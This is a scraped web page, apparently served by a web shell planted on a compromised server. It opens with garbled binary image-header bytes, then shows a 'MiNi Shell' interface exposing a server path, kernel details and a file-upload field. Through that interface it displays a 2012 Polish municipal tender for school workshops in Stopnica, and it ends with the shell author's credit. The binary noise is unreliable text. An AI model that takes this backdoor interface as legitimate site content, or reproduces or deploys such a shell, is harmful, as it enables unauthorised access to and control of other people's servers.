JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120907/336990-N-2012.html

<p class="kh_header"><b>Stopnica: Zakup usługi edukacyjnej oraz usługi w zakresie obsługi projektu w ramach realizacji projektu Chcemy być lepsi</b><br>
<b>Numer ogłoszenia: 336990 - 2012; data zamieszczenia: 07.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stopnica , ul. Tadeusza Kościuszki 2, 28-130 Stopnica, woj. świętokrzyskie, tel. 0-41 3779 800, faks 0-41 3779 606.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stopnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usługi edukacyjnej oraz usługi w zakresie obsługi projektu w ramach realizacji projektu Chcemy być lepsi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup usługi edukacyjnej oraz usługi w zakresie obsługi projektu w ramach realizacji projektu Chcemy być lepsi tj.:

Część nr 1 Gry i zabawy rozwijające umiejętność czytania i pisania w klasach I-III- 60 godzin dla pierwszej grupy- klasa I - grupa a

Część nr 2 Gry i zabawy rozwijające umiejętność czytania i pisania - 60 godzin dla drugiej grupy- klasa I- grupa  b 
Część nr 3 Gry i zabawy rozwijające umiejętność czytania i pisania - 60 godzin dla trzeciej grupy- klasa I- grupa c.

Część nr 4 Gry i zabawy rozwijające umiejętność czytania i pisania - 60  godzin dla czwartej grupy- klasa II - grupa a

 Część nr 5 Gry i zabawy rozwijające umiejętność czytania i pisania - 60  godzin dla piątej grupy- klasa II - grupa  b .

Część nr 6 Gry i zabawy rozwijające umiejętność czytania i pisania - 60  godzin dla szóstej 
grupy- klasa III- grupa  a . 

Część nr 7 Gry i zabawy rozwijające umiejętność czytania i pisania - 60 godzin dla siódmej grupy- klasa III -grupa b. 

Część nr 8 Gry i zabawy rozwijające umiejętność czytania i pisania - 60 godzin dla ósmej  grupy- klasa III- grupa c.

Część nr 9 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla pierwszej grupy - klasa I- grupa a 

Część nr 10 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla drugiej  grupy - klasa I- grupa  b 

Część nr 11 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla trzeciej  grupy - klasa I- grupa c 

Część nr 12 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla czwartej grupy - klasa II- grupa a

Część nr 13 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla piątej j grupy - klasa II- grupa  b 

Część nr 14 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla szóstej grupy - klasa III- grupa a

 Część nr 15 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla siódmej grupy - klasa III- grupa  b 

Część nr 16 Gry i zabawy rozwijające umiejętność  rozumowania i wykorzystania wiedzy w praktyce w klasach I-III - 30  godzin dla ósmej  grupy - klasa III- grupa  c 

Część nr 17 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla pierwszej grupy - klasa IV - grupa a

Część nr 18 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla drugiej grupy - klasa IV- grupa  b

Część nr 19 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla trzeciej grupy - klasa V - grupa a
Część nr 20 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla czwartej  grupy - klasa VI- grupa a

Część nr 21 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla piątej grupy - klasa VI- grupa  b

Część nr 22 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla szóstej grupy - klasa VI - grupa c

Część nr 23 Warsztaty efektywnego czytania i pisania w klasach IV-VI- 30 godzin dla siódmej  grupy - klasa VI - grupa d

Część nr 24 Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30godzin dla pierwszej grupy - klasa IV - grupa a

Część nr 25  Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla drugiej  grupy - klasa IV - grupa b

Część nr 26 Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla trzeciej  grupy - klasa V - grupa a

Część nr 27 Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla czwartej  grupy - klasa VI - grupa a

Część nr 28 Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla piątej j grupy - klasa VI - grupa b

Część nr 29  Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla szóstej  grupy - klasa VI - grupa c

Część nr 30 Warsztaty rozwijające umiejętność rozumowania i wykorzystania wiedzy w praktyce w klasach IV-VI- 30 dla siódmej  grupy - klasa VI- grupa d 

Część nr 31 Warsztaty przyrodnicze - 30 godzin dla pierwszej grupy z kl. VI a i VI b

Część nr 32 Warsztaty języka angielskiego - 30 godzin dla pierwszej grupy - klasa IV b i IV c

Część nr 33 Warsztaty języka angielskiego - 30 godzin dla drugiej grupy - klasa V a i V b

Część nr 34 Warsztaty języka angielskiego - 30 godzin dla trzeciej grupy - klasa VI a

Część nr 35 Warsztaty języka angielskiego - 30 godzin dla czwartej  grupy - klasa VI b

Część nr 36 Zajęcia korygujące wady wymowy i dysfunkcje rozwojowe - 30 godzin dla pierwszej grupy

Część 37 Zajęcia korygujące wady wymowy i dysfunkcje rozwojowe - 30 godzin dla drugiej grupy

Część 38 Zajęcia korygujące wady wymowy i dysfunkcje rozwojowe - 60 godzin dla trzeciej grupy

Część 39  Zajęcia korygujące wady wymowy i dysfunkcje rozwojowe (zajęcia terapeutyczne) - 60 godziny dla czwartej grupy 

Część 40 Zarządzanie projektem- koordynator 135 godzin

Część 41 Zarządzanie projektem-  I asystent 72 godzin

Część 42 Zarządzanie projektem- II asystent 72 godzin

Część 43 Zarządzanie projektem- osoba ds. rozliczeń finansowych 135 godzin

Wartość zamówienia nie przekracza równowartości kwoty 200 000,00 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 79.20.00.00-6, 79.21.10.00-6, 79.21.11.00-7, 79.21.11.11-0, 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku, należy złożyć stosowne oświadczenie stanowiące załącznik Nr 2 do SIWZ. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku, należy złożyć stosowne oświadczenie stanowiące załącznik Nr 2 do SIWZ. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku, należy złożyć stosowne oświadczenie stanowiące załącznik Nr 2 do SIWZ. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku, należy złożyć stosowne oświadczenie stanowiące załącznik Nr 2 do SIWZ. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku, należy złożyć stosowne oświadczenie stanowiące załącznik Nr 2 do SIWZ. Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy stanowiący Załącznik Nr 1 do niniejszej specyfikacji.
Uwaga: W przypadku składania oferty na kilka części, Wykonawca składa wypełniony formularz oferty wypełniony odpowiednio dla składanych części zamówienia.
2. Pełnomocnictwa do podpisania oferty (w przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo w formie oryginału lub kserokopii poświadczonej przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stopnica.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Stopnicy, ul. Kościuszki 2, 28-130 Stopnica, pokój 8 (I piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:00, miejsce: Urząd Gminy w Stopnicy, ul. Kościuszki 2, 28-130 Stopnica, pokój 10, sekretariat (I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie związane jest z realizacją projektu pn. Chcemy być lepsi, współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com